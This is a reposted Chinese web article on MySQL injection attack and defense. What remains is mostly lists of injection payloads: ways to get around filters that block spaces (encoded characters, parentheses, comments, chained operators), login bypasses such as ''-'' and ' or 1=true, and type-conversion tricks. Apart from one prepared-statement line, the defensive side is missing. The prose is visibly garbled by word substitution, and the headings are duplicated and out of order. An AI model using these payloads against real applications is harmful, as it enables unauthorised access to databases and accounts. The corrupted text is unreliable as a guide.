作家
登录

MySQL注入攻击与防御

作者: 来源: 2017-05-08 16:02:58 阅读 我要评论

1
  • $stmt->execute(); 
  • (1) 特别字符绕过空格

    特别字符绕过空格

    Example:

    1. '%0AUNION%0CSELECT%A0NULL%20%23 

    括号绕过空格

    括号绕过空格

    Example:

    1. UNION(SELECT(column)FROM(table)) 

    10. and/or后插入字符绕过空格

    随便率性混淆+ - ~ !可以达到绕过空格的效不雅(可以如今本地测试,混淆后须要的奇偶数可能不合)

    1. SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and-++-1=1;须要偶数个-- 
    2. SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and!!~~~~!11=1;须要奇数个! 

    其实一下的字符都可以测试

    and/or后插入字符绕过空格

    十、注释符&引号

    1. SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and/**/11=1; 
    2. SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and"11=1"; 

    1. 编码绕过

    编码绕过

    2. 关键字绕过

    测试用例information_schema.tables

    测试用例information_schema.tables

    3. 认证绕过

    1. select data from users where name="=" 
    2. select data from users where flase=" 
    3. select data from users where 00=0 

    绕过语句:'-'

    ORDER BY

    1. select data from users where name=''-'' 
    2. select data from users where name=0-0 
    3. select data from users where 00=0 

    比如登录的时刻须要输入email和passwd,可以如许输入

    1. email=''&password='' 

    类型转换

    1. ' or 1=true 
    2. ' or 1 
    3. select * from users where 'a'='b'='c' 

        推荐阅读

        如何使用vCSA6.5监控CPU、内存和网络

      如不雅体系已经连接到互联网,那么进入“Update”标签页,选择“Installed Updates”,之后“Install All Updates”。 在vSphere 6.5中,VMware改换了 vCe>>>详细阅读


      本文标题:MySQL注入攻击与防御

      地址:http://www.17bianji.com/lsqh/35071.html

    关键词: 探索发现

    乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

    网友点评
    自媒体专栏

    评论

    热度

    精彩导读
    栏目ID=71的表不存在(操作类型=0)